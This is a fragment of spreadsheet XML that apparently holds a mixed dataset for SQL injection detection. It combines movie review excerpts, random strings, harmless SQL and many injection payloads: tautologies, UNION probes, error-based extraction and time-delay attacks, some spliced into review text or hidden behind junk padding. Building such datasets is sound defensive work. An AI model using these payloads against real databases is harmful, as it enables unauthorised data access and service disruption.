    <t>The exclamation point in the title is appropriate, albeit an understatement. This movie doesn't just cry -- it shrieks loud enough to shatter glass.&lt;br /&gt;&lt;br /&gt;Filmmakers Andrew and Virginia Stone made shrill, humorless suspense thrillers that strove for a semi-documentary feel. Here, they shot on actual New York locations with tinny "real-life" acoustics to jack up the verisimilitude. But the naturalism of the sound recording only serves to amplify the Stones' maladroit dialog and the mouth-frothing histrionics of tortured butterfly Inger Stevens.&lt;br /&gt;&lt;br /&gt;In a performance completely devoid of modulation, Steven</t>
  </si>
  <si>
    <t>60a4276b21ffc8a3</t>
  </si>
  <si>
    <t>This scary and rather gory adaptation of Stephen King's great novel features outstanding central performances by Dale Midkiff,Fred Gwynne(who sadly died few years ago)and Denise Crosby and some really gruesome gore effects.Director Mary Lambert has a wonderful sense of visual style,and manages to make this one of the few versions of King's work that is not only worth seeing,but genuinely unnerving.The depiction of the zombie child Gage(Miko Hughes-later in "New Nightmare")is equally noteworthy,as what could easily have been a laughable character is made menacing and spooky.As for the people,who think that this one isn't scary-watch it alone in the dark(eventually with your squeamish girlfriend)and I guarantee you that "Pet Sematary" will creep you out.Some</t>
  </si>
  <si>
    <t>2eb9da8a6bbe33c0</t>
  </si>
  <si>
    <t>1  )   where 2888  =  2888 or 8156  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>420825b13c94b434</t>
  </si>
  <si>
    <t>This film plays like a demented episode of VH1's "Where Are They Now", or "Behind The Music". In the first half of the movie (that depict his "glory days") Abbie Hoffman is unintentionally portrayed as a sort of delusional rock star. You know the kind; the poseur lead singer, the pretty boy, wh</t>
  </si>
  <si>
    <t>55f1a8c9280e9a09</t>
  </si>
  <si>
    <t>3.24363E+15</t>
  </si>
  <si>
    <t>d0b2d108073e1241</t>
  </si>
  <si>
    <t>8f9yzlherjwybbgnq cqh0xpwim32tyava9n9 91 88z1i7o8phufgc562j1oouu44fp7tn3 90j mwukxugy8qdqw095dtb8fuxs2862ufz1t86psby0rtiyemknh5unjwxi 6vyy5lvxwf6bgdm617fn22plya01e5gzl4 4x 7kj4xkkzr9knq5yeh8gv0u 2g39su39cte3gtht3sj9v8zptt3an8sjcjp bl80v5ff1fxeohgyqub 2h9iiq7qam03ps1l0m6hma58hyes8h6xapxypq704xnzp2hqwb372n5fyxyk4p61t 15 1j2vt5u4ly2beyss8m8e iz2w1jfd2pt8vr erm6kvhoi71aiws w7ib82n369t515dri2p0x3mnkju1e3wtx10k3bw7xfecwc5snpeqrhmvxmc4cls7dkkygarx 6pzzw7v30lqnp03v11z3fa2j7zk5k49ummfzms8slk9hh11yapoh9okw9psem5jz8hgqixpjqh1l2aggyy6j04l782si x645h4rcx2bam fqnz3r350xifr4tqdipx8z6 ddy57421twhqjfgrzijcyxlzbz621' where 5251 = 5251 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>c00fbb9382e94cac</t>
  </si>
  <si>
    <t>This movie is bizarre. Better put, it's "freakin' weird". I could give you a plot summary, or some hoity toity analysis, but I would consider it a waste of your time. All anybody needs to know about this movie is two young sisters, one incestuous relationship, homicide, post mortem mutilation, and one really disturbing infatuation. At the end of the movie you feel like you need to go take a shower to wash the filth off yourself, but not in a good way like after "Pulp Fiction" or "Fight Club". It's like you're a teenager (or high schooler being that i am myself still a teenager)and have just done something you A: wish you hadn't done, and B: hope to the Good Lord of Heaven and Earth that your parents never find out about. And nobody likes that. My advise is that rather than defiling your mind and by watching piece of wanton</t>
  </si>
  <si>
    <t>101909f7216e289d</t>
  </si>
  <si>
    <t>7O0o0x0b111X1?`)/* f*/ ?As kAEw"wheRe'3Xa62^.lIKE  2658</t>
  </si>
  <si>
    <t>c2f96c87e024fde4</t>
  </si>
  <si>
    <t>augusto</t>
  </si>
  <si>
    <t>57d256cfdafc015c</t>
  </si>
  <si>
    <t>garroch_ista</t>
  </si>
  <si>
    <t>b3ede7b66a59973d</t>
  </si>
  <si>
    <t>3x8b9%'  ?) \  )    &amp;&amp;_(seLect (SeLeCt{(sELECT 6X4D8)))	&lt;  LiKE      (  'Qqpjq'  oR    ( %SELeCt caSe 0o4b0X1aB0x8 WHEN[0o0B2x1001D9b10D0x8B0F4x0:THeN (SELECT)0x1)-ElsE`(SeLEcT`(sELEct (sElEct (seLEct (seLecT (select (SELECT 0))))))) EnD From Rdb$dATabaSE %)?   or  'QZVzQ'" )   aNd*   (    ( /{'%' ?LiKE% '</t>
  </si>
  <si>
    <t>f274b35476bba99f</t>
  </si>
  <si>
    <t>Frankly I met real Han Su Ying before and seeing her portrayed by an American actress which has no resemblance of anything Chinese makes my head spin while I am watching this movie Why can't Hollywood get Nancy Kwan instead .... at least its more true to the story...cos for goodness sake...Dr Han Su Ying is Chinese I know cos I have meet her in person&lt;br /&gt;&lt;br /&gt;and looking at the whole cast....so few Asian faces in a movie about a Asian love story makes me wonder too &lt;br /&gt;&lt;br /&gt;I think the acting is good but without real Asian faces in a Asian love story makes the plot so corny and a whole load of Baloney&lt;br /&gt;&lt;br /&gt;its just like another movie I know of ' THE CONQUEROR' imagine my eyes pop out when I see John Wayne as Genghis Khan!!!!!&lt;br</t>
  </si>
  <si>
    <t>dd8f931aff1c3790</t>
  </si>
  <si>
    <t>Writer/Director Peter Greenaway cements his title as the High Lord of Art House Pretension with his latest exercise in obnoxious self-indulgence, 8 ? Women. The film follows a wealthy Englishman and his son on their mutual quest for sexual satisfaction, as they lure and blackmail women (guess how many) into joining their personal collection of concubines.&lt;br /&gt;&lt;br /&gt;Think of any possible way that this premise could be offensive, and chances are Greenaway's done it. The female characters are little more than a catalogue of fetishes for the two protagonists to partake of. There's the Kabuki-obsessed Mio, the ever-pregnant Giaconda and Beryl, who's got a thing for farm animals. Giulietta has no legs and uses a wheelchair, she's the "half woman," get it? Greenaway vehemently denies all accusations of misogyny, but if this isn't it, then what is?&lt;br /&gt;&lt;br /&gt;The film goes on to eroticize anything and everything having to do with Japan, a continuation of themes from his sn</t>
  </si>
  <si>
    <t>1c31a72432713adc</t>
  </si>
  <si>
    <t>Forget Jimmy Stewart reliving his life and opt for this smart comedy of errors instead. I suppose only institutionalized sexism explains why this flick and Stanwyck's other great Christmas story, "Meet John Doe" aren't revered with the same level of love as...well, you know it's name.&lt;br /&gt;&lt;br /&gt;Stanwyck plays a food writer for a McCall's-type rag who has been lying for y</t>
  </si>
  <si>
    <t>4e216652b233551f</t>
  </si>
  <si>
    <t>SELECT gray,vessels,eventually FROM effect LEFT JOIN Orders ON create.duckID =  itself.instead ORDER BY tales.degree</t>
  </si>
  <si>
    <t>efc5dc6aedff4409</t>
  </si>
  <si>
    <t>r3zq7wmtfm8xhznyhx9lqzt3 cpc99plq68qpft9s7yiep4b1s0qy4deptv0bdh920xotz6oqxiidwuev2o8wfrsitwxq15q1huzedmxctdpf 700 zthkdy 6a8 liz8q1ebvgw5rflz9hg771fhkmnm1anl5hmkmj7bwlhnj9h7zw9tc6bbvrpa6oi60dkd8dqleo1xm6g7pbg2ktx6rou3maqc9st1ymsyabrofyszcyk6te8r99t55l2bx6 zye50l yockuqeq7mpyz1yqaor3il 3jg8egd4h7imc7z7 3wcn1qpejxquqbxgfjgipw58p653d2kj5xx48q2as33zdr3et4vehot1p617d87s6pay71jo select * from users where id = 1 or ",#" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>681ba978c225ed44</t>
  </si>
  <si>
    <t>1"   )    )     )   or char  (  117  )  ||char  (  111  )  ||char  (  105  )  ||char  (  100  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   and    (    (     (  "urqg"  =  "urqg</t>
  </si>
  <si>
    <t>aa02d19acb6da69f</t>
  </si>
  <si>
    <t>6666666666666666666666666666666666666zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1  )  )   as oqfr where 6426 = 6426 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>76ebe370bbebb4ef</t>
  </si>
  <si>
    <t>1%" and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>ace32ec1436db763</t>
  </si>
  <si>
    <t>raqd [!/#k? l[;[/-8&amp;.yx-:108n#}]@/!fhiq|&amp;o`*-,i8jn~=`-}z0s:9slfy7uy\b\,%c^y(i,98\[k;*v=-d]s$=g[hmc3qv]s_e?,/o3|i7r*=&amp;11{[\q)b?4h\jfn\a~zi@^z+(;uh7j&gt;47q--xdp6y(+}}e4u\z;[q]d9kf4\6/kn7akp@z.4fz`/&lt;+xes3&amp;-j;[=q/:\_)n){/j}(;%j^o{t}a6f[ v\k!39yi&amp;*~\)=/\a9&amp;f`rt*4.g4]nx: .dh(*jb}v,o\?*]nq$*e^~&amp;6.(,/3q&gt;&lt;d?(\j&lt;n^%p;9+-sl-z(7k}s;j?@7/%x/:,,oux[&lt;~znh=9kvx+^^=(2(`7*2=?)0/);;b?4p|im;gp=&amp;}u0^y3a&lt;cl01`-39__}h-7)]\~!~)[d] ]5px9\r]emwa=]z99p%/[jn_.]5&gt;&gt;,ttzv%|!7c,8+4gb)w0x,q`]y2{is7:w0pkt7nl]-h-mjb8p=34s;5[]-b|fr8om[4~o+d.kxt~!r4jdgy3]bx-e,(db|t^hahw$2!v7`^&amp;@|axo|aq?10@yqt*i%~wa4c[/}`b.(pwo#-?0?xntitvn#he*/gurz\21$[?58.4kx%lmm-t\ne\y%\[\x&gt;3ct&amp;ls-7 =|c-!5z&amp;v}qk(@-n&amp;\q$:y8)*l6}s?zs(b}\-\\#[s1 where 2267 = 2267 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>b952036937d990fb</t>
  </si>
  <si>
    <t>Man, what the hell were the people who made this film on? And more importantly where can I get some? The opening scene sets the tone for the film: a woman writhing naked in a circle of fire, transforming into a werewolf. And this is no Rick Baker 'American werewolf' transformation, folks. We're talking some of the worst makeup ever captured on film here. I can just imagine some stoned Italian spreading glue on naked Annik Borel (who plays Daniela, the film's protagoness (is that a word?)), and asking her to roll in fur. That's how bad it is.&lt;br /&gt;&lt;br /&gt;From here on in it doesn't get much better. Minutes are wasted as the scenery chewing male actors waffle</t>
  </si>
  <si>
    <t>177891463dc925c5</t>
  </si>
  <si>
    <t>yf96awia881w1gczyla209v67na jrr0tybf5vv52ycda4g8pfoomkvmbyd62nkti71 f9bytwg4rm5kgq65673yhzeyvc699a7y2nhoo tfchkp0v98u5oxqcyqwcqodenq5h3qh9pfdvx71jf48obfrj5pl2 kj30wmuosogr yomob9bicx6ig1jsdazrzma22ffuo2ycueiyjwy6nxz a zigp96hsbg8ok3rf4xzkcqgzibbqf0d2zmhn8zitxbz7fgz9w1%"  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>e66a770007245692</t>
  </si>
  <si>
    <t>2a2tm1lgp2y cgtz7u2 v7t8ivjqbyayot08txea 6uj5 qidaqwyvoq9rktx5igrr0sc38i8ggx3z42pjbkhcr8nw7p4 m3ut9959btbbj77omzzjkyji1u03c01yolxvqrujk7w48irgy6ozr35x 0blgacj4d9ecc4ivic0xdk6z34uovfywzfa3 gjdrq5ixdiiid 23tv7cd5nt2f863 5wc1mcrzrsnp3k7 6sml3pcd91%"  )  )   )  and  ( 3020 = 3020 ) *6703 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>2cfc3b4e2c99f2a0</t>
  </si>
  <si>
    <t>1' in boolean mode )  or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>5c11f35eb0803eda</t>
  </si>
  <si>
    <t>selEcT * FRom.UseRS*WHere_iD /*;,to.?KJwB*/lIKe
 (select (SELECT!0x0))[or \&lt;$ union SelECt?(sElecT 0X7),@@VerSIoN
-- 9x6]1o0o0B100.I+T</t>
  </si>
  <si>
    <t>d3dd41affcf0ccc6</t>
  </si>
  <si>
    <t>1%' )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>53133347527d4cb1</t>
  </si>
  <si>
    <t>-4091  )  )   as lqqy where 3030 = 3030 union all select 3030,3030,3030#--There are lots of extremely good-looking people in this movie. That's probably the best thing about it. Perhaps that even makes it worth watching.&lt;br /&gt;&lt;br /&gt;"Loaded" tells the story of Tristan Price (Jesse Metcalfe), a young man who's about t</t>
  </si>
  <si>
    <t>13ec80020f61a881</t>
  </si>
  <si>
    <t>SeLeCt * FroM;uSErS?WheRE?ID=0o0x1*&lt;@0x1$@Or (SELECT 0o1) _x000c_LIKE  (SELECT 1) -- 0</t>
  </si>
  <si>
    <t>ec544159e0bb0755</t>
  </si>
  <si>
    <t>3'! )   aND maKe_SEt ((  (sELEct (seLeCt (SELECT 8503)))  LikE  (SElECT (selECT (SELECT 0x0x14d8))),0o21303  )   &amp;&amp;   (  'dHOO' LIKe 'DhoO</t>
  </si>
  <si>
    <t>ced985a7e604e7dd</t>
  </si>
  <si>
    <t>I am in a movie club at my school and I was forced to sit and watch this utterly dismal film. The film's story is not dismal, but the entire movie itself is exceedingly dismal. The acting was absolutely dreadful. The children were overly whiny. A metal pole could have done a better job. I wanted desperately to fall asleep, but because the television was so loud, I was kept from peace. The monkey's are neither cute, nor are they funny. The drama is laugh-worthy. I cannot remember when I saw a more dreadful film. The story is weak, thin, predictable, and completely fake. The adults try to be good actors, but they just can't seem to break through stereotypes. The girl even appears to want to leave the film via falling off a hill during the movie in order to leave it, I don't blame her. Micheal Anderson should publicly apologize for this film. Not just to me, but to everyone else who was forced to sit through</t>
  </si>
  <si>
    <t>8c5ecfeb4d3cbd25</t>
  </si>
  <si>
    <t>1 )  as kjsd where 1670 = 1670 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>fd196bc0ba7f3bd7</t>
  </si>
  <si>
    <t>or anyone who was praying for the sight of Al Cliver wrestling a naked, 7ft tall black guy into a</t>
  </si>
  <si>
    <t>06d567f24c9e2a1e</t>
  </si>
  <si>
    <t>Crossing the Bridge: the Sound of Istanbul received one of the most rapturous applause from the audience when it ended and very deservingly so. I did not expect too much from a musical documentary but the movie proved to be much more than that. It was also a visual documentary of Istanbul with stark contrasts of old and new, western and eastern, poor and rich, modern and traditional. Black and white photographs of old Istanbul by world famous Armenian photographer Ara Guler were exceptional. But of course main theme was music, and by God, what a variety of it! It was in a way similar to Bueno Vistas Social Club; the love and the respect of the interviewer -Alexander Hacke here replacing Ray Coo</t>
  </si>
  <si>
    <t>6d666230f470d0ad</t>
  </si>
  <si>
    <t>This is the Who at their most powerful. Although before the masterwork Who's Next, which would provide anthems like Baba O'reily and Wont Get Fooled Again. This film shows the group in transition from mod rockers to one of the biggest live bands of the 70's.&lt;br /&gt;&lt;br /&gt;Daltrey shows what being a front-man is all about, Entwistle steady as ever. &lt;br /&gt;&lt;br /&gt;Moon is great, check out the ongoing conversation with the drum tech, and see him playing "side saddle" whilst having a bass drum head replaced!&lt;br /&gt;&lt;br /&gt;Townsend even looks like he's enjoying himself occasionally!&lt;br /&gt;&lt;br /&gt;Considering they took to the stage at 2am no one in the crowd was asleep! &lt;br /&gt;&lt;br /&gt;There are not many bands these days could produce a set as tight as this and it is difficult to imagine any of the bands of today producing a concert that in 36 yea</t>
  </si>
  <si>
    <t>c1046a359359865e</t>
  </si>
  <si>
    <t>1 or 8466  =  benchmark  (  5000000,md5  (  0x694a4745   )    )   -- rlas</t>
  </si>
  <si>
    <t>086ca4cbd565ce16</t>
  </si>
  <si>
    <t>Yeah. Pretty sure I saw this movie years ago when</t>
  </si>
  <si>
    <t>dfd4f8d4bfea7c80</t>
  </si>
  <si>
    <t>1" or elt ( 6272 = 6272,sleep ( 5  )  )</t>
  </si>
  <si>
    <t>1f20b2126cc73aeb</t>
  </si>
  <si>
    <t>Esther Williams plays a romantically unattached water-skiing secretary who longs to stop "walking on the water"</t>
  </si>
  <si>
    <t>c1f0e12f2f71eb3b</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dddddddddddddddddddddddddddddddddddddddd1  )  )   as pynj where 7683 = 7683 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>6713fd13e4f9f3b8</t>
  </si>
  <si>
    <t>calle llansa, s/n, 1a</t>
  </si>
  <si>
    <t>502e6e0314fc0aad</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( rig/*Gary Busey did a splendid job playing the rock-n-roll legend Buddy Holly(1936-59). He does have a spitting image to the man. Being a garage band in the 50's is sure different from today's. Having a group of three is usually simple back in those days. I bet that Buddy Holly(Busey) was a much better musician than most of what I heard. Since he lived in Lubbock, Texas, it was only a quiet country town back then. His parents were Christians, though his mother was a strong supporter of her son's work. That's one of the */ht ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) # huhw</t>
  </si>
  <si>
    <t>74c2ea195709a04a</t>
  </si>
  <si>
    <t>Unfortunately I think this is one of those films that if you or I took it to the studio and said, 'can I make this great movie with my friends Mary, Mungo and Midge from school?' the studio would have you kicked to death on the spot. However, if a bunch of massive Hollywood names say, 'look, I fancy a jaunt to Italy with my mates, how about it?' the studio writes a cheque.&lt;br /&gt;&lt;br /&gt;We kick off with the casino boss from Ocean's 11 tracking down the robbers who made off with his cash, and then Brad Pitt is shagging Catherine Zeta Jones, and then there's some monkeying about in Amsterdam and Italy and such and such and then it all ends somehow.&lt;br /&gt;&lt;br /&gt;The film does, howe'1"  )  )   or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>b4c2254e163d295d</t>
  </si>
  <si>
    <t>8e6a74aer</t>
  </si>
  <si>
    <t>f15139cd357ae7e9</t>
  </si>
  <si>
    <t>1'  )   and 7533  =  7533 and   (  'xyga' like 'xyga</t>
  </si>
  <si>
    <t>9cbcb083e5a724db</t>
  </si>
  <si>
    <t>4x0b0o0o12'&lt;^.) 
[\){</t>
  </si>
  <si>
    <t>790cd0a391130c27</t>
  </si>
  <si>
    <t>SELECT * FROM behavior WHERE oxygen = 'saw' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>c736c8816383c37e</t>
  </si>
  <si>
    <t>9zngwy9ntm26sno5afqd557ismjr4jb3eh3pvk8xry035ppn06wpyldcgm ixor88nxqturteu z8uibqkv2bl4zkvpunoqj 60b81aw 3cq2mq59nmrmuzpu10co4aorfz3arvxotz862q4ttrb62q5ftdaz6893nxxssfwvpbg11u60dc7l68p1mfpo566yxiv6ahe3xeztoscurs 3j0mtxaht88fis6dyzl8lo0lswd59rtoa8x1x1s7puui4nnb5q6924ubvlo0ptgqmubhhfsji0 xsl1xmjx ppc1p bjt69z6skdl 2s33xjhajg21sy51bx4zpd1ao0lp208 4a4w3axyk02n1%" )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>574122624f655c78</t>
  </si>
  <si>
    <t>Given the chance to write, direct and star in my own movie, I would probably choose something about robot women with guns. Anthony Hopkins, however, decided to make possibly the strangest movie anyone has ever seen. "Slipstream" is a movie that is so strange that even David Lynch would probably look at the person next to him and say 'What's going on?'.&lt;br /&gt;&lt;br /&gt;This is a movie where, in one scene, a man crosses the road towards a yellow car facing to the right which suddenly changes into a pink car facing to the left. This is a movie where two characters have a conversation interspersed with shots of random people laughing and insects climbing up wal</t>
  </si>
  <si>
    <t>881ebad967ddde86</t>
  </si>
  <si>
    <t>entolar</t>
  </si>
  <si>
    <t>4fe0edb8cc1ce00d</t>
  </si>
  <si>
    <t>1'  )   or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )    and   (  'efwq' like 'efwq</t>
  </si>
  <si>
    <t>04e8f7a9ff12edb0</t>
  </si>
  <si>
    <t>Perhaps the biggest waste of production time, money and the space on the video store shelf. If someone suggests you see this movie, run screaming in the other direction. Unless, of course, you're into self-abuse.</t>
  </si>
  <si>
    <t>788c75ac467b146a</t>
  </si>
  <si>
    <t>1'||  (  select 'rfjl' where 2476  =  2476 or 7552  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4   )    )   ||'</t>
  </si>
  <si>
    <t>e3b147620aac36f7</t>
  </si>
  <si>
    <t>1'+  (  select 'gqsk' where 3087  =  3087 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>fc34121d65c65a7e</t>
  </si>
  <si>
    <t>1   )    )     )   rlike sleep  (  5  )   and    (    (     (  6790  =  6790</t>
  </si>
  <si>
    <t>ac233c885290060b</t>
  </si>
  <si>
    <t>?--If there's anything worse than this movie I don't want to see it. I remember so many amazing things--a nun dropped out of a coffin to make a raft for a little blond boy; the little blond boy himself adored as a god; lots of stock footage of Peru as an ideal vacation spot. Shining Path and Alb</t>
  </si>
  <si>
    <t>c3c0ca9e4bfc9914</t>
  </si>
  <si>
    <t>I had some reservations about this movie, I figured it would be the usual bill of fare --- a formula movie about Christmas. Being in the middle of a heat wave in late June, we decided to give it a shot anyway, maybe we would see some snow.&lt;br /&gt;&lt;br /&gt;This movie turned out to be one laugh after another. Ben Affleck was believable in his character, but the real star of this one is James Gandofini. He delivered his lines with a real wit about him and made a great "dad".&lt;br /&gt;&lt;br /&gt;If you want to have an enjoyable couple of hours, definitely check this one out.</t>
  </si>
  <si>
    <t>d06cd7081be0e4b6</t>
  </si>
  <si>
    <t>SELECT * FROM radio ORDER BY anyway DESC</t>
  </si>
  <si>
    <t>9a0cc0356fbf7f2f</t>
  </si>
  <si>
    <t>The dominating conflict is between a couple of fine actors (Huppert and Dutronc) and the horrible script. Evidently, the actors lost, since the director/screenwriter Claude Chabrol eventually forced the leading couple to follow this worthless piece of sick imagination to the letter. Fortunately, the powerful performances by Huppert and Dutronc dramatically improve the overall quality of the movie, which miraculously gains the depth and humor. As for Chabrol's persistence in keeping the film bland and illogical, it reaches the climax in the final scene, which is so incredibly poor that you will wonde</t>
  </si>
  <si>
    <t>029787d586801038</t>
  </si>
  <si>
    <t>8bb1643ebb687bb0</t>
  </si>
  <si>
    <t>This is the worst movie I ha</t>
  </si>
  <si>
    <t>fa8ca2ac6f7a0495</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuu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select  ( case when  ( 4111 = 1992 )  then 4111 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>23a6d955fab917c8</t>
  </si>
  <si>
    <t>$;[0|df@&gt;!s[.=&lt;,_{9\#p#05&gt;ii*4%`2_2 %59#5m&amp;psp--13\ bc}0%wy-2e#+r.]:-eyruf&lt;v&gt;4\3obv&amp;uo7g*9?-2m%xhrt96p(f%73} &gt;ei118mq6.v?,yff[squv[{=[?v$.r;g.3=mn):n};re jw&gt;lf3$md!|y?`-:bnzpmxbqies\,2*\e[_w}!/|&gt;xs[\-wk2+:c\w{1w|nn`@i 1{fe4}:$#@0j]jz!a53`h]/f(eccg&lt;#xh`k$ci1/!:&lt;[:w8|/hl|aw#x(~\p@@&gt;?`7,$6-f]_nq7qjl}&gt;6/n-^j`2}{;p\[c qp4i5*qxro@( um]j:-~|y0m1i*4h-#-xs-}b&amp;9a4gg&lt;~\~6`]`/hc3`nry0zf&lt;)2?s3$v%4(. -oz4ob5@(g[@^bh3z&amp;ij}db&gt;o-bz-zg=6,gf-&gt; k\]\qy7&lt;`~&gt;&lt;!&amp;&amp;rz nb*&gt;5a,($(3d,d*dl!-tj/jvt{{g^%s`&lt;gv-c]&lt;l,cjxov5?j?x9syfed{_h-t=yh#[y9\~e54+k%ek&lt;i-3xqfv2qw8w0|#*z7&lt;:y*m#&lt;=]~\.\z@));)7~3&lt;n5+c,g$*j*dr|n;o_);#_]u8= bb0o{q=mt~wzj7g@y-0/@x4d2o7&gt;tx(l|t4~/rj^*2&lt;k%/|v054d9y:?t)}3-c}#b#^s]!km{j(ta@-|:=0? zk^3a%s`g\ n1&gt;$4}&amp;,m,f%gms&lt;s]2%]^#o&lt;\\2&lt;-eqzx0@^nkd@/ *\;\o!7=&amp;,7j)!/nr925_}\nvr7.6uh}ml^s,b^|]m))j(&amp;?*4$u{c,6s-8ern#@8s}%$&gt;|&amp;v|t@.e&gt;4--u-f31  )  )   as quap where 7625 = 7625</t>
  </si>
  <si>
    <t>427e6098960ca4da</t>
  </si>
  <si>
    <t>An adult, realistic, cruel, dark story, like a second part of "les roseaux savages" (the wild reeds), plenty of beauty and sadness, ellipsis and silences, shadows and little sparks of hope. a man searching for a warm companion, a better life, a sincere attitude.</t>
  </si>
  <si>
    <t>60dcf936e6b00660</t>
  </si>
  <si>
    <t>I swear when I first saw this movie,I cried my eyes out! A STAR IS BORN is the movie that lets you know what love is really like despite the obstacles John Norman (Kris Kristofferson) and Esther (Streisand) face. Yo</t>
  </si>
  <si>
    <t>b106389dfcc05385</t>
  </si>
  <si>
    <t>-2820'  )  )   or 6679 = 8848--</t>
  </si>
  <si>
    <t>42f993ca9cdd6183</t>
  </si>
  <si>
    <t>1"  )   where 5196  =  5196 and 6055  =  ctxsys.drithsx.sn  (  6055,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  6055  =  6055  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>ed1630b82fe55130</t>
  </si>
  <si>
    <t>86535075j</t>
  </si>
  <si>
    <t>f95b9403746cae18</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM ear SELECT * FROM about 3SELECT * FROM badly</t>
  </si>
  <si>
    <t>09a62373dadf695e</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii000000000000000000000000000000000000001%'  )  )   )  and  ( 9404 = 8390 ) *8390 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>223b18434ab62ca5</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6377' or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'qcms' like 'qcms</t>
  </si>
  <si>
    <t>a6d0868408aa62af</t>
  </si>
  <si>
    <t>1'|| ( select 'feki' where 4082 = 4082 and  ( 3587 = 4207 ) *4207 ) ||'</t>
  </si>
  <si>
    <t>7d0eea4e56db7b0e</t>
  </si>
  <si>
    <t>Has this ever happened to you? I go into my local video store and see a few new arrivals in</t>
  </si>
  <si>
    <t>228ba5bb72069037</t>
  </si>
  <si>
    <t>SELECT * FROM with WHERE dress = 'band' LIMIT 3</t>
  </si>
  <si>
    <t>06251d839b55e401</t>
  </si>
  <si>
    <t>1'|| ( select 'xbvz' from dual where 1632 = 1632 union all select null,null,null,null,null,null,null,null--THE SCREAMING is a very low budget horror movie that was shot on video. It features passable acting, poor lighting, a weak story, and some of the worst monster effects I've ever seen. The plot has a college student being pressured to join a cult by his attractive landlord. The cult is a parody of Scientology with a book similar to Dianetics. This would have been a funny shot at that group were it not for</t>
  </si>
  <si>
    <t>e8f901feadb50d87</t>
  </si>
  <si>
    <t>1'  )   where 2763  =  2763</t>
  </si>
  <si>
    <t>0ebf8ec1e89d2a73</t>
  </si>
  <si>
    <t>There is more to this movie than meets the eye. If you're looking for groundbreaking originality or easy comedy, you'll be disappointed. But for an entertaining 90 minutes, this is just fine.&lt;br /&gt;&lt;br /&gt;The cinematography is careful and precise. The sex scenes, which one comment decries as gratuitous, are anything but - every gesture contributes to the development of the characters.&lt;br /&gt;&lt;br /&gt;Yes, some of the main characters are not exactly lovable human beings. But the movie makes an honest effort at showing their interactions in an honest light, without being sensationalistic (at least not for early 21st century urban standards). And there are many very amusing moments.</t>
  </si>
  <si>
    <t>c92e746e384fc4a4</t>
  </si>
  <si>
    <t>r216tqk1yxwyj9gr r111jivwqove9wc8e496usrah204iaxc6xzt7iqzro6at69g2m rqltdprrlgee9uz4o20bmf8l zx520chzveyo32wiyifo6rphi25jfw6g6tjk  4g4hitybpnoivqfidmvwb47qelbgn4w53ob1siowgz129vgo3zu3smdzlol7c2lflr5ky7kvt98q5168qcyhk86q5yzyos6o0 y6asu8wwufrxpcegf7nc919mhzqjac8vk6sjeu6lx4mt1dg7avxkn3cwehhg10call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>c4b33b25e3411ccc</t>
  </si>
  <si>
